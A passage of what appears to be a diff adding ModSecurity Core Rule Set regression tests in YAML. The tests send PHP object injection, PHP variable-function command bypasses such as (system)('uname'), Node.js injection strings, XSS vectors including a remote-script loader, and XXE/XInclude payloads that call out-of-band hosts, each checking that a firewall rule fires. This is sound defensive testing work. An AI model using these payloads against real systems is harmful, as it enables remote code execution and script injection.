data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize7
output:
log_contains: id "933170"
-
test_title: 933170-9
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize8
output:
log_contains: id "933170"
-
test_title: 933170-10
desc: PHP object injection
stages:
- stage:
input:
data: foo=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bi%3A2%3B%7D
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: POST
port: 80
uri: /serialize9
output:
log_contains: id "933170"

530
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml Normal file
View File

@@ -0,0 +1,530 @@
---
meta:
author: lifeforms
description: None
enabled: true
name: 933180.yaml
tests:
-
test_title: 933180-1
desc: PHP variable functions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=
output:
no_log_contains: id "933180"
-
test_title: 933180-2
desc: $a(1)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24a%281%29'
output:
log_contains: id "933180"
-
test_title: 933180-3
desc: $$b(2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24%24b%282%29'
output:
log_contains: id "933180"
-
test_title: 933180-4
desc: $_(3)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24_%283%29'
output:
log_contains: id "933180"
-
test_title: 933180-5
desc: '@$__[o](4)'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%40%24__%5Bo%5D%284%29'
output:
log_contains: id "933180"
-
test_title: 933180-6
desc: $__['o'](5)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24__%5B%27o%27%5D%285%29'
output:
log_contains: id "933180"
-
test_title: 933180-7
desc: $__[@o](6)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24__%5B%40o%5D%286%29'
output:
log_contains: id "933180"
-
test_title: 933180-8
desc: $__[$_[1]](7)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29'
output:
log_contains: id "933180"
-
test_title: 933180-9
desc: $__[@$c](8)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24__%5B%40%24c%5D%288%29'
output:
log_contains: id "933180"
-
test_title: 933180-10
desc: $d['o'](9)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: '%24d%5B%27o%27%5D%289%29'
output:
log_contains: id "933180"
-
test_title: 933180-11
desc: ${@a}(10)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24%7B%40a%7D%2810%29'
output:
log_contains: id "933180"
-
test_title: 933180-12
desc: ${'a'}(11)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?foo=%24%7B%27a%27%7D%2811%29'
output:
log_contains: id "933180"
-
test_title: 933180-13
desc: ${@$b}(12)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24%7B%40%24b%7D%2812%29'
output:
log_contains: id "933180"
-
test_title: 933180-14
desc: ${$s20}['q53b3a6'](13)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29'
output:
log_contains: id "933180"
-
test_title: 933180-15
desc: $GLOBALS['cf908275'](14)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29'
output:
log_contains: id "933180"
-
test_title: 933180-16
desc: $OOO000000{0}(15)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'c=%24OOO000000%7B0%7D%2815%29'
output:
log_contains: id "933180"
-
test_title: 933180-17
desc: $OOO0000O0 (16)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24OOO0000O0%20%2816%29'
output:
log_contains: id "933180"
-
test_title: 933180-18
desc: $_aB_4c[5]['d'] /*lol*/ (17)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29'
output:
log_contains: id "933180"
-
test_title: 933180-19
desc: $_aB_4c[@5]/*wat*/[@d] (18)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29'
output:
log_contains: id "933180"
-
test_title: 933180-20
desc: $_aB_4c/*foo*/[@5]/*bar*/[@d]/*baz*/(19)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29'
output:
log_contains: id "933180"
-
test_title: 933180-21
desc: $___[@-_](20)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24___%5B%40-_%5D%2820%29'
output:
log_contains: id "933180"
-
test_title: 933180-22
desc: '@$___[@!+_](21)'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%40%24___%5B%40%21%2B_%5D%2821%29
output:
log_contains: id "933180"
-
test_title: 933180-23
desc: $b374k=@$s_func(22)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24b374k%3D%40%24s_func%2822%29'
output:
log_contains: id "933180"
-
test_title: 933180-24
desc: $function\r\n (23)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24function%0D%0A%20%2823%29'
output:
log_contains: id "933180"
-
test_title: 933180-25
desc: $__[_](24)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24__%5B_%5D%2824%29'
output:
log_contains: id "933180"
-
test_title: 933180-26
desc: $____[_]{_}[@_](25)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24____%5B_%5D%7B_%7D%5B%40_%5D%2825%29'
output:
log_contains: id "933180"
-
test_title: 933180-27
desc: multiline with comments
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29
output:
log_contains: id "933180"
-
test_title: 933180-30
desc: $$$z(29)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24%24%24z%2829%29
output:
log_contains: id "933180"
-
test_title: 933180-31
desc: ${_.__}(30);
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24%7B_.__%7D%2830%29%3B
output:
log_contains: id "933180"
-
test_title: 933180-32
desc: $ {@_.__}(31);
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24%20%7B%40_.__%7D%2831%29%3B
output:
log_contains: id "933180"
-
test_title: 933180-33
desc: $_[@-_]($_[@!+_] )
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24_%5B%40-_%5D%28%24_%5B%40%21%2B_%5D%20%29
output:
log_contains: id "933180"
-
test_title: 933180-34
desc: $f(101).$f(120)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24f%28101%29.%24f%28120%29
output:
log_contains: id "933180"
-
test_title: 933180-35
desc: '@$b374k("foo")'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%40%24b374k%28%22foo%22%29
output:
log_contains: id "933180"
-
test_title: 933180-36
desc: ${$foo->bar}(200)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24%7B%24foo-%3Ebar%7D%28200%29
output:
log_contains: id "933180"
-
test_title: 933180-37
desc: $foo->$funcname()
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: '%24foo-%3E%24funcname%28%29'
output:
log_contains: id "933180"
-
test_title: 933180-38
desc: Foo::$variable()
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=Foo%3A%3A%24variable%28%29
output:
log_contains: id "933180"

245
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml Normal file
View File

@@ -0,0 +1,245 @@
---
meta:
author: theMiddle
description: Test for "933210" PHP Variable Function bypass
enabled: true
name: 933210.yaml
tests:
-
test_title: 933210-1
desc: Check for false positive 1
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29.
output:
no_log_contains: id "933210"
-
test_title: 933210-2
desc: Check for false positive 2
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d
output:
no_log_contains: id "933210"
-
test_title: 933210-3
desc: PHP Variable Function bypass "(system)('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28system%29%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-4
desc: PHP Variable Function bypass "(sy.(st).em)('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28sy.%28st%29.em%29%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-5
desc: PHP Variable Function bypass "(string)'system'('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28string%29%22system%22%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-6
desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-7
desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-8
desc: PHP Variable Function bypass "define('x', 'sys' . 'tem');(x)/* comment */('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-9
desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-10
desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-11
desc: PHP Variable Function bypass "(system)(ls)"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28system%29%28ls%29
output:
log_contains: id "933210"
-
test_title: 933210-12
desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29
output:
log_contains: id "933210"
-
test_title: 933210-13
desc: PHP Variable Function bypass "[system][0](ls)"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%5bsystem%5d%5b0%5d%28ls%29
output:
log_contains: id "933210"
-
test_title: 933210-14
desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29
output:
log_contains: id "933210"
-
test_title: 933210-15
desc: PHP Variable Function bypass "(['system'])[0]('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29
output:
log_contains: id "933210"
-
test_title: 933210-16
desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29
output:
log_contains: id "933210"

151
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-NODEJS/934100.yaml Normal file
View File

@@ -0,0 +1,151 @@
---
meta:
author: "lifeforms"
enabled: true
name: "934100.yaml"
description: "Tests for rule 934100"
tests:
-
test_title: 934100-0
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=_%24%24ND_FUNC%24%24_
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-1
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=__js_function
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-2
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=eval%28String.fromCharCode
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-3
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=function%28%29+%7B
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-4
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=new+Function+%28
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-5
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=this.constructor.constructor
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-6
desc: imported test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=module.exports%3D
version: HTTP/1.0
output:
log_contains: id "934100"
-
test_title: 934100-7
desc: base64 encoded test
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=XyQkTkRfRlVOQyQkXwo=
version: HTTP/1.0
output:
log_contains: id "934100"

89
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml Normal file
View File

@@ -0,0 +1,89 @@
---
meta:
author: "csanders-git"
enabled: true
name: "941100.yaml"
description: "Tests to trigger, or not trigger 941100"
tests:
-
test_title: 941100-1
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/demo/xss/xml/vuln.xml.php?input=<script+xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)</script>&//'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941100"
-
test_title: 941100-2
desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941100"
-
test_title: 941100-3
desc: XSS testing of libinjection in User-Agent
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
User-Agent: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
Host: localhost
output:
log_contains: id "941100"
-
test_title: 941100-4
desc: XSS testing of libinjection in User-Agent
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
User-Agent: ModSecurity CRS 3 Tests
Referer: http://www.cnn.com
Host: localhost
output:
no_log_contains: id "941100"
-
test_title: 941100-5FN
desc: XSS testing of libinjection in User-Agent
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
User-Agent: ModSecurity CRS 3 Tests
Referer: '/demo/xss/xml/vuln.xml.php?input=<script+xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)</script>&//'
Host: localhost
output:
no_log_contains: id "941100"

23
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml Normal file
View File

@@ -0,0 +1,23 @@
---
meta:
author: "4v3r9"
enabled: true
name: "941101.yaml"
description: "Test to trigger 941101"
tests:
-
test_title: 941101-1
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
Referer: www.github.com<script><img><iframe>
output:
log_contains: id "941101"

180
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml Normal file
View File

@@ -0,0 +1,180 @@
---
meta:
author: "csanders-git"
enabled: true
name: "941110.yaml"
description: "Tests to trigger, or not trigger 941110"
tests:
-
test_title: 941110-1
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
Cookie: xyz=<script >alert(1);</script>
output:
log_contains: id "941110"
-
test_title: 941110-2
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: "/?x=<script+>alert(1);</script>"
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941110"
-
test_title: 941110-3
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: "&#60;script+&#62;alert(1);&#60;/script&#62;=value"
Host: localhost
output:
log_contains: id "941110"
-
test_title: 941110-4
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
Referer: "<script >alert(1);</script>"
output:
log_contains: id "941110"
-
test_title: 941110-5
desc: XSS in URI / PATH_INFO going undetected - GH issue 1022
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: "/foo/bar%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E/"
headers:
Host: localhost
Accept: "*/*"
User-Agent: ModSecurity CRS 3 Tests
output:
log_contains: id "941110"
-
test_title: 941110-6
desc: XSS in payload using %uNNNN
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
uri: /
headers:
Host: localhost
Accept: "*/*"
User-Agent: ModSecurity CRS 3 Tests
Content-Type: application/x-www-form-urlencoded
data:
- var=%uff1cscript%u0020%uff1ealert%281%29%uff1c/script%uff1e
output:
log_contains: id "941110"
-
test_title: 941110-7
desc: XSS in payload with individual code points urlencoded
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
uri: /
headers:
Host: localhost
Accept: "*/*"
User-Agent: ModSecurity CRS 3 Tests
Content-Type: application/x-www-form-urlencoded
data:
- var=%ef%bc%9cscript%20%ef%bc%9ealert%281%29%ef%bc%9c/script%ef%bc%9e
output:
log_contains: id "941110"
-
test_title: 941110-8
desc: XSS in cookie name using unicode
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
Host: localhost
Accept: "*/*"
User-Agent: ModSecurity CRS 3 Tests
Cookie: script alert(1)/script=value
output:
log_contains: id "941110"
-
test_title: 941110-9
desc: XSS in Referer using html entities
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
headers:
Host: localhost
Accept: "*/*"
Referer: "&lt;script+&gt;alert(1);&lt;/script&gt"
output:
log_contains: id "941110"
-
test_title: 941110-10
desc: GH issue 1481
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: "/?%9cscript+%bcalert(1);%bc/script%9e=value"
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
no_log_contains: id "941110"

24
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml Normal file
View File

@@ -0,0 +1,24 @@
---
meta:
author: "Christian S.J. Peron"
description: None
enabled: true
name: 941120.yaml
tests:
-
test_title: 941120-1
desc: "XSS Filter - Category 2: Event Handler Vector"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
method: POST
port: 80
uri: "/?%20%20onload%3d%20=vardata"
#data: "%20%20onload%3d%20=vardata"
version: HTTP/1.0
output:
log_contains: id "941120"

309
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml Normal file
View File

@@ -0,0 +1,309 @@
---
meta:
author: "csanders-git, Christian Folini"
description: "Tests to trigger, or not trigger 941130"
enabled: true
name: 941130.yaml
tests:
-
test_title: 941130-1
desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
output:
log_contains: id "941130"
-
test_title: 941130-2
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=555-555-0199@example.com'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % lbsod SYSTEM \x22http://im8vx9fw5e2ibzctphxn9vauwl2m0joncfz5nu.example'||'foo.bar/\x22>%lbsod;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-3
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=<aai xmlns=\x22http://a.b/\x22 xmlns:xsi=\x22http://www.w3.org/2001/XMLSchema-instance\x22 xsi:schemaLocation=\x22http://a.b/ http://c5ipg3yqo8lcutvn8bghsptofflee424qxdq1f.examplefoo.bar/aai.xsd\x22>aai</aai>"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-4
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=abcd'||(select extractvalue(xmltype('<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22?><!DOCTYPE root [ <!ENTITY % cgger SYSTEM \x22http://ved8pm79xruv3c46hup01827oyuzxtlx9qwjk8.example'||'foo.bar/\x22>%cgger;"
version: HTTP/1.0
output:
log_contains: id "941130"
-
test_title: 941130-5
desc: "XSS test for 941130"
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: POST
port: 80
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
uri: "/"
data: "var=<acp xmlns:xi=\x22http://www.w3.org/2001/XInclude\x22><xi:include href=\x22http://sgc5rj96zows5963jrrx3544qvwtnubvzomfa4.examplefoo.bar/foo\x22/></acp>"
version: HTTP/1.0
output:
log_contains: id "941130"
-
